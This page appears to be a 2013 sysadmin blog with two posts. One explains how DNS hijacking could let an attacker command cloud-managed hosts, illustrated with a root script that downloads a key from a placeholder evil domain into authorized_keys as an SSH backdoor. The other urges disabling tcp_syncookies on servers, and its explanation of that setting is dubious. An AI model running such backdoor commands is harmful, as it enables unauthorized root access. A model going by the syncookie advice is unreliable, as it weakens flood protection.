Next generation cloud automation: October 2013

Every time I see a story like this, I freak out a little:

http://thehackernews.com/2013/10/worlds-largest-web-hosting-company_5.html

Long story short: DNS hijacking.

When we look at the cloud offering landscape we see cloud providers like Amazon, RackSpace, and Google, but there are also cloud management companies like RightScale and Scalr. These cloud management companies will sometimes lay in their own custom software bits that help aid in the configuration and management of a given compute resources.

In most cases ( and we can even include things like chef servers here as well ) the compute resource that is being managed will make a call out to the "control server" for instructions. But how does it know which server to contact? That's where DNS comes in, for example:

configuration.us-east-1.mycompany.com

Would be a DNS entry that actually points to:

cf-chef-01.stackName0.deploymentName0.regionName.domainName.TLD

The DNS eventually points to an IP, and the client makes the call.

If an attacker is able to hyjack mycompany.com, they could point configuration.us-east-1 at their own IP address. Most of these configuration management applications use some kind of authentication or validation to prove they are who they are. In the case of chef, the calls are wrapped in encrypted payloads that can only be decrypted by a key on the server side, which makes "man in the middle" attacks much more difficult.

In some cases the configuration management software simply makes a call to a worker queue which uses a basic username/password system. In this case one could simply wrap any type of generic worker queue with a "always pass authentication" switch that would always allow the client to successfully authenticate. This would allow you to control the client by simply injecting worker elements into the queue.

For example, we could create a worker element that runs the following script as root:

#!/bin/bash
curl -o /tmp/tmp.cache.r1234 http://my.evil.domain.com/public_key
cat /tmp/tmp.cache.r1234 >> /root/.ssh/authorized_keys

This would work great for any node that isn't in an VPC and is attached to a public IP. Other tickery could be used to extend the evilness of this hack, but the point is that if you can execute something on the remote box as root, you're pretty well fucked.

This is why DNS hijacking stories scare me a little.

Linux itself is just a kernel, all of the crap around the kernel, from bash, to KDE is considered part of the distro. Linux distros come in many flavors, shapes and sizes. This is benificial to everyone as it allows for a few generic "types" of distros that can then specialize with further customizations. For example, Ubuntu is derived from the Debian base type. Similarly CentOS is derived from Red Hat Enterprise Linux.

The differences between CentOS and RHEL are mostly related to licensing and support. Red Hat the company publishes, maintains and supports the Red Hat Enterprise Linux ( RHEL ) distribution. Their product isn't Linux, it's actually supporting and maintaining the distribution around Linux. CentOS is not a product, it's maintained by the community according to their perfectly adequate community standards.

Amazon also makes it's own AMI. There AMI is specifically designed to work in their EC2 environment. The expectation is that this AMI will be used in a high traffic environment.

When having a discussion about which distribution to go with it's important to pay attention to the expectations of use. These expectations aren't always as obvious as the expectations around the Amazon AMI. Amazon is making it's expectations very clear:

"the instance that you use with this AMI will take significant amounts of traffic from one or may sources"

This expectation is set by the engineers that were paid large sums of money to ensure that these expectations are reflected in every decision made by the maintainers of the Amazon AMI. Amazon pinned their reputation on this AMI and they use it in their own production environments, that tells me quite a bit about what went into making this distro happen. They also support it as part of an enterprise support contract. All of these facts make the Amazon AMI a very solid choice for cloud operations.

Other distros, like CentOS are a far less clear on their expectations. For instance, CentOS seems to live in many worlds with no clear, specific role or specialization. However, certain choices made by the maintainer can give us an general idea of what the intent might be.

For example, if a distro made a choice to, by default, protect the system from a type of attack known as a "syn flood" you would see the following:

cat /proc/sys/net/ipv4/tcp_syncookies
1

This means that tcp_syncookies is enabled. This is a setting which says "don't allow too many people from a single IP address flood this computer."

This is great for desktops, but it's directly in contrast to how servers are supposed to work. This is exactly opposite of what you want in a high-volume environment.

It's a very easy fix, and in our case, all I had to do is add a single line to the startup scrip for the service nodes.

"echo 0 > /proc/sys/net/ipv4/tcp_syncookies\n",

Easy peasy.

Here's what you would see in EC2 if you were using an ELB:

Instances are fine, everything is in "In Service" state.
You run ab -n 10000 -c 500 http://your_host/hb
About half way through the test the ELB goes nuts, all of the instances are in "Out of Service" state.
The application is fine, but the operating system seems to be completely offline from the perspective of the load balancer, but you can ssh into the instance, and telnet works fine.

What's happening is that the box is basically being DDOS'd from the haproxy's that run as the ELB. This type of mitigation is only useful on desktops because this is usually handled by other points upstream when in the cloud or any kind of professionally built data center environment.

I remember writing about this many years ago while working at Deep Rock Drive, I'm just astonished that we still see this today in professional environments.

Next generation cloud automation

Monday, October 7, 2013

DNS hacking paranoia

Friday, October 4, 2013

tcp syn flooding ... why does this keep happening?

Blog Archive